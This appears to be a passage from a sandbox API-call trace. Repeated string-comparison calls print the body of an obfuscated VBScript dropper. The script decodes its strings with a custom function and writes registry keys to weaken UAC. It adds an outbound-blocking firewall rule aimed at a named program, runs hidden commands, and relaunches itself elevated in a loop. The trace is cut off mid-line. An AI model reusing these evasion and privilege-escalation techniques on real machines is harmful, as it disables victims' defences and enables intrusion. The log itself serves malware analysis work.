bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.338] wcsncmp (_String1="\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0226.339] wcsncmp (_String1="\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.339] wcsncmp (_String1="Dim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.339] wcsncmp (_String1="im rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf 